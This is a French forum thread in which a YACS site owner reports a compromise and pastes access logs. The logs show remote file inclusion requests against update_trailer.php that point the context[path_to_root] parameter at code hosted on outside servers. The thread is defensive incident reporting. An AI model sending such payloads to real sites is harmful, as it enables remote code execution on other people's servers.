hacking de mes sites? [Résolu]
la solution est donnée par Bernard: http://www.yacs.fr/article-5817-alerte-de-securite
| Avancement | ![]() |
| Workflow | Besoin d'aide |
| Statut | Une solution est disponible |
bonjour,
Je viens de recevoir deux message d'OVH au sujet de mes sites (j'utilise yacs)
Problème rencontré : Hidden PERL script
Commande apparente : lynx
Exécutable utilisé : /usr/bin/perl
Horodatage: Mon Feb 16 22:04:47 CET 2009
quand je regarde les logs, je vois ceci:
ns1.f1contact.com www.sitenumero1.com - [16/Feb/2009:19:32:46 +0100] "GET /controlscripts/update_trailer.php?context[path_to_root]=http:www.edupa.uva.es/tutoriavirtual/claroline/exercice/idsoev6.txt
HTTP/1.1" 403 237 "-" "libwww-perl/5.810"
ns1.f1contact.com www.sitenumero1.com - [16/Feb/2009:19:32:46 +0100] "GET //scripts/update_trailer.php?context[path_to_root]=http://www.edupa.uva.es/tutoriavirtual/claroline/exercice/idsoev6.txt
HTTP/1.1" 403 228 "-" "libwww-perl/5.810"
plutao.lusodigital.net www.sitenumero1.com - [16/Feb/2009:19:35:13 +0100] "GET /controlscripts/update_trailer.php?context[path_to_root]=http:www.edupa.uva.es/tutoriavirtual/claroline/exercice/idsoev6.txt
HTTP/1.1" 403 237 "-" "libwww-perl/5.805"
plutao.lusodigital.net www.sitenumero1.com - [16/Feb/2009:19:35:34 +0100] "GET /serversscripts/update_trailer.php?context[path_to_root]=http://www.edupa.uva.es/tutoriavirtual/claroline/exercice/idsoev6.txt
HTTP/1.1" 403 237 "-" "libwww-perl/5.805"
srv003.infobox.ru sitenumero2.info - [16/Feb/2009:21:58:19 +0100] "GET //yacs/scripts/update_trailer.php?context[path_to_root]=http://www.kbmaeil.com/kboard/test.txt?? HTTP/1.1" 404 229 "-" "Avant Browser (http://www.avantbrowser.com)"
J'ai renommé le fichier update_trailer.php
puis j'ai remis le dossier www à 705 et tout semble ok à nouveau...
mais je trouve ça bizarre...
suis je la seul à qui ceci est arrivé?
